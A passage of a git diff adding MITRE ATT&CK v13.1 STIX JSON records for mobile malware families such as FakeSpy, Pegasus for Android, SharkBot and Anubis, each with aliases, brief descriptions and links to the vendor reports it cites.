citizens.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--838f647e-8ff8-48bd-bbd5-613cee7736cb.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--838f647e-8ff8-48bd-bbd5-613cee7736cb.json new file mode 100644 index 0000000000000000000000000000000000000000..1b292f43ac3dd4f1ae2f3eda8943de6c6cb0483c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--838f647e-8ff8-48bd-bbd5-613cee7736cb.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--d0eef57c-ff9e-4405-b19c-db501fe70522", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Ofir Almkias, Cybereason" + ], + "x_mitre_aliases": [ + "FakeSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "type": "malware", + "created": "2020-09-15T15:18:11.971Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0509", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0509" + }, + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." + } + ], + "modified": "2020-10-06T20:09:57.659Z", + "name": "FakeSpy", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) is Android spyware that has been operated by the Chinese threat actor behind the Roaming Mantis campaigns.(Citation: Cybereason FakeSpy)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b.json new file mode 100644 index 0000000000000000000000000000000000000000..d93faf5b35e31cb401d94c1ecacc615d53c60f05 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--9de398bb-b902-491c-a125-4f28d0ae8f4e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "SpyDealer", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) is Android malware that exfiltrates sensitive data from Android devices. (Citation: PaloAlto-SpyDealer)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "SpyDealer" + ], + "type": "malware", + "id": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0324", + "external_id": "S0324" + }, + { + "source_name": "SpyDealer", + "description": "(Citation: PaloAlto-SpyDealer)" + }, + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--89c3dbf6-f281-41b7-be1d-a0e641014853.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--89c3dbf6-f281-41b7-be1d-a0e641014853.json new file mode 100644 index 0000000000000000000000000000000000000000..105e89c97d77596dca77aeb0f3fd8f21a9ad7f2f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--89c3dbf6-f281-41b7-be1d-a0e641014853.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--8b76cee9-0580-4381-8459-6cd461545467", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Concipit1248", + "Corona Updates" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--89c3dbf6-f281-41b7-be1d-a0e641014853", + "type": "malware", + "created": "2020-04-24T15:12:10.817Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0426", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0426" + }, + { + "source_name": "Corona Updates", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-30T18:30:05.787Z", + "name": "Concipit1248", + "description": "[Concipit1248](https://attack.mitre.org/software/S0426) is iOS spyware that was discovered using the same name as the developer of the Android spyware [Corona Updates](https://attack.mitre.org/software/S0425). Further investigation revealed that the two pieces of software contained the same C2 URL and similar functionality.(Citation: TrendMicro Coronavirus Updates)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--936be60d-90eb-4c36-9247-4b31128432c4.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--936be60d-90eb-4c36-9247-4b31128432c4.json new file mode 100644 index 0000000000000000000000000000000000000000..cb8e90c276346d17e155273ec141007cdc40579d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--936be60d-90eb-4c36-9247-4b31128432c4.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--1d4351f7-6787-4bb1-99a4-7ac860ab8149", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "RuMMS", + "description": "[RuMMS](https://attack.mitre.org/software/S0313) is an Android malware family. (Citation: FireEye-RuMMS)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--936be60d-90eb-4c36-9247-4b31128432c4", + "created": "2017-10-25T14:48:48.917Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0313", + "external_id": "S0313" + }, + { + "source_name": "RuMMS", + "description": "(Citation: FireEye-RuMMS)" + }, + { + "source_name": "FireEye-RuMMS", + "description": "Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. Retrieved February 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--93799a9d-3537-43d8-b6f4-17215de1657c.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--93799a9d-3537-43d8-b6f4-17215de1657c.json new file mode 100644 index 0000000000000000000000000000000000000000..873e8c907bfe71fd016c6965d3444053659b0d4c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--93799a9d-3537-43d8-b6f4-17215de1657c.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--4eb4a60d-267f-489c-9186-8e75a35ba442", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Pegasus for Android", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) is the Android version of malware that has reportedly been linked to the NSO Group. (Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor) The iOS version is tracked separately under [Pegasus for iOS](https://attack.mitre.org/software/S0289).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Pegasus for Android", + "Chrysaor" + ], + "type": "malware", + "id": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "created": "2017-10-25T14:48:41.202Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0316", + "external_id": "S0316" + }, + { + "source_name": "Pegasus for Android", + "description": "(Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor)" + }, + { + "source_name": "Chrysaor", + "description": "(Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor)" + }, + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + }, + { + "source_name": "Google-Chrysaor", + "description": "Rich Cannings et al.. (2017, April 3). An investigation of Chrysaor Malware on Android. Retrieved April 16, 2017.", + "url": "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62.json new file mode 100644 index 0000000000000000000000000000000000000000..e39503abf07ab71681b32bb6b3b837339bc78f35 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--41486315-cd28-433e-bbba-b8222b23d9b1", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "FrozenCell" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "type": "malware", + "created": "2021-02-17T20:43:52.033Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0577", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0577" + }, + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-04-19T14:07:24.519Z", + "name": "FrozenCell", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) is the mobile component of a family of surveillanceware, with a corresponding desktop component known as KasperAgent and [Micropsia](https://attack.mitre.org/software/S0339).(Citation: Lookout FrozenCell)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce.json new file mode 100644 index 0000000000000000000000000000000000000000..d7e2792beaf0e8b4b277546bcd47839964dd6ec8 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--50705e7d-e39c-4cbc-824a-8b36ac86c5f9", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "AndroidOS/MalLocker.B" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce", + "type": "malware", + "created": "2020-10-29T18:41:49.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0524", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0524" + }, + { + "source_name": "Microsoft MalLockerB", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T18:41:49.272Z", + "name": "AndroidOS/MalLocker.B", + "description": "[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) is a variant of a ransomware family targeting Android devices. It prevents the user from interacting with the UI by displaying a screen containing a ransom note over all other windows. (Citation: Microsoft MalLockerB)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9cd72f5c-bec0-4f7e-bb6d-296937116291.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9cd72f5c-bec0-4f7e-bb6d-296937116291.json new file mode 100644 index 0000000000000000000000000000000000000000..34e0888e3ce17ab20602dae7c84cec68aecd8229 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9cd72f5c-bec0-4f7e-bb6d-296937116291.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--038ff49f-31de-416a-9858-88c2f392b71f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-28T21:05:57.018Z", + "name": "SharkBot", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) is a banking malware, first discovered in October 2021, that tries to initiate money transfers directly from compromised devices by abusing Accessibility Services.(Citation: nccgroup_sharkbot_0322)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "SharkBot" + ], + "type": "malware", + "id": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "created": "2023-01-18T19:44:52.711Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1055", + "external_id": "S1055" + }, + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a \u201cnew\u201d generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381.json new file mode 100644 index 0000000000000000000000000000000000000000..fa91a311de8b2cb2b094518b1e756aecebef3925 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--f41ad7de-97a1-4f94-8fd2-cbb5fe2cf44d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "RedDrop", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) is an Android malware family that exfiltrates sensitive data from devices. (Citation: Wandera-RedDrop)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "RedDrop" + ], + "type": "malware", + "id": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0326", + "external_id": "S0326" + }, + { + "source_name": "RedDrop", + "description": "(Citation: Wandera-RedDrop)" + }, + { + "source_name": "Wandera-RedDrop", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.", + "url": "https://www.wandera.com/reddrop-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a0d774e4-bafc-4292-8651-3ec899391341.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a0d774e4-bafc-4292-8651-3ec899391341.json new file mode 100644 index 0000000000000000000000000000000000000000..54b1ceed752cc3cae4a9e767258374df1186b40c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a0d774e4-bafc-4292-8651-3ec899391341.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--1fd7d976-6540-40de-b0cf-01a5be61f920", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "CHEMISTGAMES" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "type": "malware", + "created": "2020-12-31T18:25:04.779Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0555", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0555" + }, + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2021-03-25T16:42:05.526Z", + "name": "CHEMISTGAMES", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) is a modular backdoor that has been deployed by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: CYBERWARCON CHEMISTGAMES)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a15c9357-2be0-4836-beec-594f28b9b4a9.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a15c9357-2be0-4836-beec-594f28b9b4a9.json new file mode 100644 index 0000000000000000000000000000000000000000..3d7da16c375832885dd1cb18230727382a198f2d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a15c9357-2be0-4836-beec-594f28b9b4a9.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--37b89d02-516d-4a83-9657-65823f4597eb", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:19:15.826Z", + "name": "YiSpecter", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) is a family of iOS and Android malware, first detected in November 2014, targeting users in mainland China and Taiwan. [YiSpecter](https://attack.mitre.org/software/S0311) abuses private APIs in iOS to infect both jailbroken and non-jailbroken devices.(Citation: paloalto_yispecter_1015)", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "YiSpecter" + ], + "type": "malware", + "id": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "created": "2017-10-25T14:48:48.301Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0311", + "external_id": "S0311" + }, + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a1867c56-8c86-455a-96ad-b0d5f7e2bc17.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a1867c56-8c86-455a-96ad-b0d5f7e2bc17.json new file mode 100644 index 0000000000000000000000000000000000000000..0a2a2c3ce9758b6326326cbfcece67c8a43fa729 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a1867c56-8c86-455a-96ad-b0d5f7e2bc17.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--363e1611-2fba-4bf9-a72d-34915d44cd00", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Trojan-SMS.AndroidOS.Agent.ao", + "description": "[Trojan-SMS.AndroidOS.Agent.ao](https://attack.mitre.org/software/S0307) is Android malware. (Citation: Kaspersky-MobileMalware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--a1867c56-8c86-455a-96ad-b0d5f7e2bc17", + "created": "2017-10-25T14:48:46.411Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0307", + "external_id": "S0307" + }, + { + "source_name": "Trojan-SMS.AndroidOS.Agent.ao", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e.json new file mode 100644 index 0000000000000000000000000000000000000000..8eba384284a937a237aeb18378af910298f810e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--19d7f108-520e-4663-9e2c-98bb1cf95d14", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Anubis" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "type": "malware", + "created": "2020-04-08T15:41:19.114Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0422", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0422" + }, + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "modified": "2021-09-20T13:50:01.923Z", + "name": "Anubis", + "description": "[Anubis](https://attack.mitre.org/software/S0422) is Android malware that was originally used for cyber espionage, and has been retooled as a banking trojan.(Citation: Cofense Anubis)", + "x_mitre_version": "1.3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a3dad2be-ce62-4440-953b-00fbce7aba93.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a3dad2be-ce62-4440-953b-00fbce7aba93.json new file mode 100644 index 0000000000000000000000000000000000000000..64d578f6b2beb83050aecab9d4e1106445da193a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a3dad2be-ce62-4440-953b-00fbce7aba93.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--a3a0f5e0-204c-4991-8957-5ed7a1fc95a0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "AndroRAT", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) is malware that allows a third party to control the device and collect information. (Citation: Lookout-EnterpriseApps)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "created": "2017-10-25T14:48:47.363Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0292", + "external_id": "S0292" + }, + { + "source_name": "AndroRAT", + "description": "(Citation: Lookout-EnterpriseApps)" + }, + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a5528622-3a8a-4633-86ce-8cdaf8423858.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a5528622-3a8a-4633-86ce-8cdaf8423858.json new file mode 100644 index 0000000000000000000000000000000000000000..3e879c821c7df46c774aadcfae7ef4aa46a45b46 --- /dev/null +++ 